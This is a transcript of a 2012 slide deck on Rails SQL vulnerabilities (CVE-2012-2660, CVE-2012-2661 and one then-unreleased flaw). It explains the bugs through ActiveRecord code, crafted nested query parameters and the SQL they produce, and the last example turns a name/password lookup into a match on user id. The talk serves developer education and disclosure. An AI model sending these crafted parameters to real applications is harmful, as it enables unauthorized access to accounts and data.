Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Recent Rails SQL Issues" - 2012

"Recent Rails SQL Issues" - 2012

711272a06d435ca5139b50874351cdbf?s=128

Justin Collins

April 23, 2015
Tweet

Transcript

  1. Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661

  2. CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x

    and 3.x
  3. ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end

  4. Query Parameters ?name[] {"name"=>[nil]}

  5. ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end

  6. Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

  7. CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query

    keys Affects Rails 3.x
  8. ActiveRecord Query User.where(:name => params[:name])

  9. ActiveRecord Query User.where("users.name" => params[:name])

  10. Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}

  11. ActiveRecord Query User.where(:name => {"users.id" => "1"})

  12. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1
  13. Unreleased Vulnerability Allows some manipulation of WHERE clause via nested

    hashes in query values Affects 2.3.x and 3.x
  14. ActiveRecord Query User.where(:name => params[:name], :password => params[:password])

  15. Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}

  16. ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )

  17. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1 AND "users"."id" = 1